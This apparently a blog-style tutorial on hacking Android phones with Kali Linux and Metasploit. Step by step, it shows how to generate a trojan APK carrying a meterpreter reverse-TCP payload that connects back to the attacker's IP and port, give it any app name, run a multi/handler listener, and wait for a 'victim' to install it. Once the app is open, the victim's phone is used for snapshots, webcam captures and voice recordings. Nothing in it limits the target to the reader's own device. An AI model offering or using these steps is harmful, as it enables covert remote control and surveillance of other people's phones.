Android devices have become a potential target from the day they were introduced in the market. The are proved to be good targets as they give out a lot of information about the target. There are various ways to hack android phone like through an app, browser, etc.
What you need?
All you need is Kali Linux installed on Vmware.
How to?
What you need?
All you need is Kali Linux installed on Vmware.
How to?
- Open the terminal and type the command ifconfig and note down the eth0 ip.
- Now type the command cd Desktop so that you can get your apk file on the desktop of the virtual machine.
- Now type the command msfpayload android/meterpreter/reverse_tcp LHOST= ip LPORT=port R > hcak.apk. Here you have to paste the ip after LHOST and you can change hcak to any name you would prefer for the app.
- Now type msfconsole & hit enter and then type use exploit/multi/handler & hit enter.
- Now type set payload android/meterpreter/reverse_tcp and hit enter to set the payload for the handler.
- Now to set the listener ip and port type set lhost ip and set lport port (make sure that the ip and port should be the same as that of the msfpayload command). To check if the ip and host are properly set type show options and hit enter.
- Now type exploit and hit enter and wait for the victim to install the apk and open it.
- Now type ifconfig or sysinfo to find out details about your target.You can try different commands to take snapshots, webcam snaps, voice recording,etc.
Note:-
You will only have the access to the phone till the session ends if the session ends then you have to wait till the victim runs the app again.